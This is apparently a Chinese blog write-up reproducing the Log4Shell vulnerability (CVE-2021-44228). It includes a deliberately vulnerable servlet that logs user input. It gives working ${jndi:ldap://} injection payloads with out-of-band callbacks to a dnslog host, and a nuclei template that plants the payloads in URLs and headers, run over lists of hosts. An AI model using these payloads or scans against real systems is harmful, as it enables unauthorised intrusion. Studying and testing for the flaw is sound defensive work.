CVE-2021-44228:Apache Log4j2 远程代码执行漏洞分析

只能说太猛了,没有做不到,只有想不到。

复现

步骤一:新建webapp

image-20211210050128548

步骤二:配置pom.xml

1
2
3
4
5
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>

步骤三:添加目录和配置

添加java目录和resources/log4j2.properties

image-20211210050405442

log4j2.properties内容

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
<Appenders>
<Console name="Console">
<PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
</Console>
</Appenders>
<Loggers>
<Root level="debug">
<AppenderRef ref="Console"/>
</Root>
</Loggers>
</Configuration>

步骤四:写漏洞代码

写一个简单的获取日志的Servlet并在web.xml中配置映射

web.xml内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>Archetype Created Web Application</display-name>

<servlet-mapping>
<servlet-name>default</servlet-name>
<url-pattern>/qwq/*</url-pattern>
</servlet-mapping>

<servlet>
<servlet-name>default</servlet-name>
<servlet-class>pers.neo.foobar</servlet-class>
</servlet>
</web-app>

pers.neo.foobar内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
package pers.neo;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;

public class foobar extends HttpServlet{
private String message;
private static Logger logger_ =LogManager.getLogger();

public void init() throws ServletException
{
// 执行必需的初始化
message = "Hello World my servlet";
}

public void doGet(HttpServletRequest request,
HttpServletResponse response)
throws ServletException, IOException
{
// 设置响应内容类型
response.setContentType("text/html");

// 实际的逻辑是在这里
PrintWriter out = response.getWriter();

out.println("<h1>" + message + "</h1>");
out.println("<h1>" + "aaaaan" + "</h1>");
out.println("<h1>" + request.getParameter("a") + "</h1>");
logger_.error("oh my god\t"+request.getParameter("a"));
}

public void destroy()
{
// 什么也不做
}

}

步骤五:启动server

新建artifact,配置tomcat服务器,启动server

image-20211210050805985

image-20211210050735318

image-20211210050831643

步骤六:验证PoC

打PoC,观察现象

1
2
3
${jndi:ldap://god.********..ceye.io/log4j2}

http://localhost:8081/llog4j/qwq/12?a=%24%7bjndi%3aldap%3a//god.********.ceye.io/log4j2%7d

image-20211210051346772

dnslog接收到请求

image-20211210051318462

日志中打印出内容

image-20211210051505639

步骤七:RCE

自动化

自建dnslog

DNSlog-Go

参考 https://zhuanlan.zhihu.com/p/218555418 使用阿里云域名

  1. 添加两条DNS记录,将ns1.findneo.techns2.findneo.tech 解析到VPS IP。通过nslookup.exe ns1.findneo.tech看是否生效。需要一些时间。
  2. 将findneo.tech的DNS解析服务器设置为ns1.findneo.techns2.findneo.tech。通过nslookup.exe -qt=ns findneo.tech看是否生效。需要更多时间。
  3. https://github.com/lanyi1998/DNSlog-GO/releases 下载release,在服务器上运行。

VTest

https://github.com/opensec-cn/vtest

nuclei模板

安装nuclei ,需要go1.7。

1
2
3
4
go env -w GO111MODULE=on
go env -w GOPROXY=https://goproxy.cn,direct,https://proxy.golang.org
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

参考 https://github.com/projectdiscovery/nuclei/blob/master/SYNTAX-REFERENCE.md 编写模板

执行

1
2
3
nuclei -t D:\dev\nuclei\log4j_rce_20211209.yaml -l demo  -proxy http://127.0.0.1:8080 -v

shuf http.txt|head -n 100 |nuclei -t D:\dev\nuclei\log4j_rce_20211209.yaml -proxy http://127.0.0.1:8080 -v

勉强能用,但不稳定

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
id: log4j2_rce_20211209
info:
name: log4j RCE
author: findneo
tags: rce,log4j2,log4j
reference:
https://findneo.github.io/211210-log4j-rce
https://nuclei.projectdiscovery.io/templating-guide/interactsh/
severity: high

requests:
- method: GET
path:
# - "{{BaseURL}}/llog4j/qwq/123?a=%24%7bjndi%3aldap%3a%2f%2fpath2.{{Host}}.ys1m5f%2eceye%2eio%7d"
# - "{{BaseURL}}/llog4j/qwq/123?a=%24%7bjndi%3aldap%3a%2f%2fpath.{{interactsh-url}}%7d"
# - "{{BaseURL}}/llog4j/qwq/123?a=%24%7bjndi%3aldap%3a%2f%2fc6p8peuc8rcd8hei6blgcg3e3xeyyyyyn.interactsh.com%7d"
- "{{BaseURL}}/login/%24%7bjndi%3aldap%3a%2f%2furip.{{Host}}.ys1m5f%2eceye%2eio%7d/?%24%7bjndi%3aldap%3a%2f%2furik.{{Host}}.ys1m5f%2eceye%2eio%7d=%24%7bjndi%3aldap%3a%2f%2furiv.{{Host}}.ys1m5f%2eceye%2eio%7d"
redirects: true
max-redirects: 3
headers:
User-Agent: Random-${jndi:ldap://ua.{{Host}}.ys1m5f.ceye.io}/-UA
Origin: https://google.com.${jndi:ldap://origin.{{Host}}.ys1m5f.ceye.io}
Cookie : i_am_cookie_${jndi:ldap://cookie.{{Host}}.ys1m5f.ceye.io}
Referer : https://referer/${jndi:ldap://ref.{{Host}}.ys1m5f.ceye.io}